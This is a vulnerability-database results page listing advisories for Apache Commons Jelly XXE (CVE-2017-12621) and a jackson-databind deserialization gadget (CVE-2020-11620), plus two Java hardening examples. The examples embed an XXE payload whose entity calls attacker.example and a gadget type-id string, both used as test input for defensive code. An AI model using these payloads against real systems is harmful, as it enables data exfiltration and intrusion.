21 matches found
EUVD-2020-0384
Malware in sbrugna...
com.canoo:webtest (>=586 <=1393), com.flexiblewebsolutions.xdriveunit:xdriveunit (=0.3) +79 more potentially affected by CVE-2017-12621 via commons-jelly:commons-jelly (>=1.0 <=1.0-beta-4)
Affected packages (Maven):
 - commons-jelly:commons-jelly =1.0, =586, =0.1, =20050708.205531, =1.2, =1.0-M5, =1.0.1, =1.3, =1.9
 - jepi:jepi =1.0
 - marmalade:marmalade-compat-jelly =1.0-alpha-3
 - maven-plugins:maven-sourceforge-plugin =1.3
 - and more
Source CVEs: CVE-2017-12621
Source advisory: ...
Improper Restriction of XML External Entity Reference in Jelly
During Jelly XML file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE)...
CVE-2017-12621
An XML External Entity (XXE) injection vulnerability was found in the Commons Jelly library. If a custom doctype entity is declared with a SYSTEM entity with a URL and that entity is used in the body of the Jelly file, the parser will attempt to connect to the provided URL...
jackson-databind: Serialization gadgets in commons-jelly:commons-jelly
A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...
Important: Red Hat Security Advisory: rh-maven35-jackson-databind security update
An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for eac...
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)...
Deserialization Of Untrusted Object
FasterXML jackson-databind is vulnerable to deserialization of untrusted data. When polymorphic (default) typing is enabled, the type identifier in the input selects the class to instantiate, and the gadget class org.apache.commons.jelly.impl.Embedded from commons-jelly was not blocked by default. A remote attacker can gain unauthorized access to...
CVE-2020-11620
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)...
UBUNTU-CVE-2020-11620
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)...
PT-2020-4067 · Fasterxml +3 · Jackson-Databind +3
Name of the Vulnerable Software and Affected Versions: FasterXML jackson-databind versions 2.x before 2.9.10.4
Description: The issue is related to the deserialization mechanism in the FasterXML jackson-databind library, specifically with the commons-jelly component. This can allow a remote...
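The CVE-2020-11620 entries above describe the general jackson-databind failure mode: with default typing enabled, the type identifier embedded in attacker-controlled JSON picks the class to instantiate, and 2.9.10.4 closed this particular hole by adding org.apache.commons.jelly.impl.Embedded to the blocklist. The following is an added example, not code from FasterXML, Apache Commons Jelly or any advisory on this page. It contrasts the legacy enableDefaultTyping() pattern with the allowlisting PolymorphicTypeValidator available since jackson-databind 2.10. The Greeting class and the JSON payload are constructed for illustration; the payload names only the gadget class from the advisory and supplies no properties, because the point is that the type id is refused before the class is ever used.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JellyGadgetTypingCheck {

    // Constructed payload in the [typeId, value] shape that default typing accepts.
    // Only the class name from the advisory is used; no gadget properties are supplied.
    static final String GADGET_PAYLOAD =
        "[\"org.apache.commons.jelly.impl.Embedded\", {}]";

    // Hypothetical application type that we do want to accept polymorphically.
    public static class Greeting {
        public String text;
    }

    /**
     * The pre-2.10 pattern the CVE-2020-11620 family hinges on: every class on the
     * classpath is a candidate type, and safety rests on jackson's blocklist alone.
     * Shown for contrast only; main() never uses it.
     */
    @SuppressWarnings("deprecation")
    static ObjectMapper unsafeLegacyMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    /** Default typing restricted to an explicit allowlist; any other type id is refused. */
    static ObjectMapper safeMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType(Greeting.class)
            .build();
        return JsonMapper.builder()
            .activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL)
            .build();
    }

    /** Returns true if the payload deserialized, false if its type id was refused. */
    static boolean tryDeserialize(ObjectMapper mapper, String json) throws Exception {
        try {
            mapper.readValue(json, Object.class);
            return true;
        } catch (InvalidTypeIdException e) {
            // Thrown whether or not commons-jelly is on the classpath: an unknown class
            // fails resolution, a known one fails the allowlist check.
            System.out.println("refused type id: " + e.getTypeId());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper safe = safeMapper();
        String benign = "[\"" + Greeting.class.getName() + "\", {\"text\":\"hi\"}]";
        System.out.println("benign accepted? " + tryDeserialize(safe, benign));   // true
        System.out.println("gadget accepted? " + tryDeserialize(safe, GADGET_PAYLOAD)); // false
    }
}
```

Build against jackson-databind 2.10 or later. The structural fix is the allowlist, not the version bump: upgrading to 2.9.10.4 only adds this one gadget to the blocklist, and the repeated CVEs against jackson-databind 2.9.x show how that race plays out. Code that still calls enableDefaultTyping() with no validator should be treated as a finding regardless of the library version.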
Apache Commons Jelly Security Bypass Vulnerability
Apache Commons Jelly is a Java- and XML-based scripting engine from the Apache Software Foundation. A security vulnerability exists in Apache Commons Jelly version 1.0. An attacker can exploit this vulnerability to bypass security restrictions and perform unauthorized operation...
XML External Entity (XXE)
Apache commons-jelly is vulnerable to XML External Entity (XXE) injection. When Jelly XML files are parsed with a custom doctype declared as a SYSTEM entity with a URL at the beginning of the file, the parser will connect to the URL at instantiation...
CVE-2017-12621
During Jelly XML file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE)...
Apache Commons Jelly connects to url with certain custom doctype definitions.
Severity: Medium
Vendor: The Apache Software Foundation
Versions Affected: commons-jelly-1.0 core, namely commons-jelly-1.0.jar
Description: During Jelly XML file parsing with Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of t...
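The CVE-2017-12621 entries above all describe the same trigger: a DOCTYPE declaring a SYSTEM entity with a URL, referenced from the body of the Jelly script, which the Xerces reader resolves by contacting that URL. The following is an added example, not code from Apache Commons Jelly or from any advisory on this page. It constructs a Jelly script of that shape (the entity URL is a placeholder, not a real endpoint) and shows the JAXP/Xerces feature set that makes the underlying SAX reader refuse it. Jelly's own XMLParser is not wired in here, since the page does not document how that class exposes its reader; the features are the ones any parser handed Jelly input needs.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class JellyXxeCheck {

    // Constructed Jelly script in the shape the advisory describes: a DOCTYPE that
    // declares a SYSTEM entity pointing at a URL, then uses that entity in the body.
    // The host name is a placeholder, not a real endpoint.
    static final String UNTRUSTED_JELLY_SCRIPT =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE jelly [\n"
      + "  <!ENTITY ext SYSTEM \"http://attacker.example/collect\">\n"
      + "]>\n"
      + "<j:jelly xmlns:j=\"jelly:core\">\n"
      + "  <j:set var=\"x\" value=\"&ext;\"/>\n"
      + "</j:jelly>\n";

    /** Builds a SAX parser that cannot resolve external entities or external DTDs. */
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setXIncludeAware(false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any DOCTYPE outright; Jelly scripts have no legitimate need for one.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth should a DOCTYPE ever be permitted again: never fetch
        // general or parameter entities, never load an external DTD.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return f.newSAXParser();
    }

    /** Returns true if the document parsed, false if the parser rejected it. */
    static boolean parseSafely(String xml) throws Exception {
        try {
            hardenedParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (SAXException e) {
            // Xerces reports that the DOCTYPE is disallowed before any entity is resolved,
            // so no connection to the SYSTEM URL is ever attempted.
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("untrusted script accepted? " + parseSafely(UNTRUSTED_JELLY_SCRIPT)); // false
        String plain = "<j:jelly xmlns:j=\"jelly:core\"><j:set var=\"x\" value=\"1\"/></j:jelly>";
        System.out.println("plain script accepted? " + parseSafely(plain)); // true
    }
}
```

This compiles against the JDK alone. If setFeature throws SAXNotRecognizedException or SAXNotSupportedException, the reader in use is not the one being hardened; let that exception propagate rather than fall back to a parser that honours external entities, since failing open is exactly the behaviour the advisory describes.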